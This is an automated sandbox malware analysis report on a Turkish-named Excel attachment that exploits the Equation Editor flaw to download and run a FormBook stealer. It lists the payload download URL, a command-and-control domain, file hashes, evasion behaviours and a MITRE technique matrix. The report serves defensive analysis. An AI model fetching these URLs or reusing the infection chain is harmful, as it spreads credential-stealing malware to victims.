    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E3AC0 push esp; ret
    Source: initial sampleStatic PE information: section name: .text entropy: 7.92488075838
    Source: initial sampleStatic PE information: section name: .text entropy: 7.92488075838
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exe TID: 1036Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: EQNEDT32.EXE, 00000002.00000002.956335622.00000000006F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: EQNEDT32.EXE, 00000002.00000002.956117653.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036306C7 mov edx, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    barindex
    Yara detected FormBook
    Source: Yara matchFile source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Yara detected FormBook
    Source: Yara matchFile source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Scripting    		Path Interception11
    Process Injection    		111
    Masquerading    		OS Credential Dumping11
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts1
    Native API    		Boot or Logon Initialization Scripts1
    Extra Window Memory Injection    		1
    Disable or Modify Tools    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth33
    Ingress Tool Transfer    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts22
    Exploitation for Client Execution    		Logon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection    		NTDS1
    Remote System Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Scripting    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items2
    Software Packing    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
    Extra Window Memory Injection    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    TedarikciSiparisi_83613 .xlsx34%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe41%ReversingLabsWin32.Trojan.Pwsx
    C:\Users\Public\vbc.exe41%ReversingLabsWin32.Trojan.Pwsx

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    4.2.vbc.exe.300000.0.unpack100%AviraHEUR/AGEN.1222351Download File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://180.214.238.224/__cloud_for_file/vbc.exe95C:0%Avira URL Cloudsafe
    http://180.214.238.224/__cloud_for_file/vbc.exeu0%Avira URL Cloudsafe
    http://180.214.238.224/__cloud_for_file/vbc.exe100%Avira URL Cloudmalware
    http://180.214.238.224/__cloud_for_file/vbc.exeX0%Avira URL Cloudsafe
    http://180.214.238.224/__cloud_for_file/vbc.exehhC:0%Avira URL Cloudsafe
    www.mentalnayaarifmetika.online/ocgr/100%Avira URL Cloudmalware
    http://180.214.238.224/__cloud_for_file/vbc.exej0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://180.214.238.224/__cloud_for_file/vbc.exetrue
    • Avira URL Cloud: malware
    		unknown
    www.mentalnayaarifmetika.online/ocgr/true
    • Avira URL Cloud: malware
    		low

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://180.214.238.224/__cloud_for_file/vbc.exe95C:EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://180.214.238.224/__cloud_for_file/vbc.exeuEQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://180.214.238.224/__cloud_for_file/vbc.exeXEQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://180.214.238.224/__cloud_for_file/vbc.exehhC:EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://180.214.238.224/__cloud_for_file/vbc.exejEQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    180.214.238.224
    		unknownViet Nam
    		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:626598
    Start date and time: 14/05/202215:12:572022-05-14 15:12:57 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 34s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:TedarikciSiparisi_83613 .xlsx
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.expl.evad.winXLSX@6/18@0/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 1% (good quality ratio 0.8%)
    • Quality average: 56.5%
    • Quality standard deviation: 32.2%
    HCA Information:
    • Successful, ratio: 99%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .xlsx
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe
    • TCP Packets have been reduced to 100
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    15:14:38API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
    15:14:43API Interceptor19x Sleep call for process: vbc.exe modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    Download File
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Category:downloaded
    Size (bytes):229376
    Entropy (8bit):7.903722597215708
    Encrypted:false
    SSDEEP:3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
    MD5:CE42FE431B88922AB59B6FD880CADCF6
    SHA1:652914D960DA1D37D270DB7F6E3B07C9D4B0E3A9
    SHA-256:4D8CC87942499042195CEC4FDB2FC5869D4BF98A1D827FD30FB74E82CF0FDC0F
    SHA-512:62B30A77CB2EF3491ABB3EC517CA966C4A9EAFA0F263118BA817A4CE87F8D3CDDC014BCE25FF268435B7F69605E6C14B8031B482F7CAF00E855964C618C609BA
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 41%
    Reputation:low
    IE Cache URL:http://180.214.238.224/__cloud_for_file/vbc.exe
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~b.................v...|.......... ........@.. ....................................`.................................p...W....................................P............................................... ............... ..H............text....u... ...v.................. ..`.reloc...............x..............@..B.rsrc................z..............@..@........................H........P...D...........=..............................................".(.....*....0...........(>...*..0..6.......+.&.(.....(.....(....:.....E.........-......&&..(.... y...(....%& ~...(....%&(.... ....(.... ....(....(.... ....(.... ....(....(.... ....(.... ....(....%&(.... ....(....%& ....(....(.......(....(....:.....E........&..(......(....9....&.(.......(....(....%&:.....E........&...(.......(........(....%&(....&. (....8.....$(....(....%.((.......%.,(....~?....%.0(......

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13820A74.png

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Reputation:high, very likely benign file
    Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A09A689.jpeg

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Reputation:high, very likely benign file
    Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC1A5DE.emf

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):1099960
    Entropy (8bit):2.0152800116954332
    Encrypted:false
    SSDEEP:3072:vXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:1ahIFdyiaT2qtXl
    MD5:BD4C089D8210CF4FCF74013334B2B925
    SHA1:1B98EDBC5386B92D82AC9B6174DEE1BC5411CC5E
    SHA-256:BC1A75F99B79C98350DA4BB5561EAC01186DACF8D64F3AE8D4822E1A028644D9
    SHA-512:5D7A6FB4798CC15FFDEF6F5282CD2A07034C4C8C92AFFF6199382F0FA72E9C8B46C625D3B0A7311AD5E3D1EBE27DBDD3E35166A758DC0DB8D974A722FB20B48C
    Malicious:false
    Reputation:high, very likely benign file
    Preview:....l...............C...........m>...&.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$...`....f.x.@h.%...<...............d...RQUQ............L.......$QUQ........ ...Id.x........ ............d.x............M....................Oq.....%...X...%...7...................{$..................C.a.l.i.b.r.i............................8.x........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E390AF6.png

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51ABE6A8.png

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
    Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

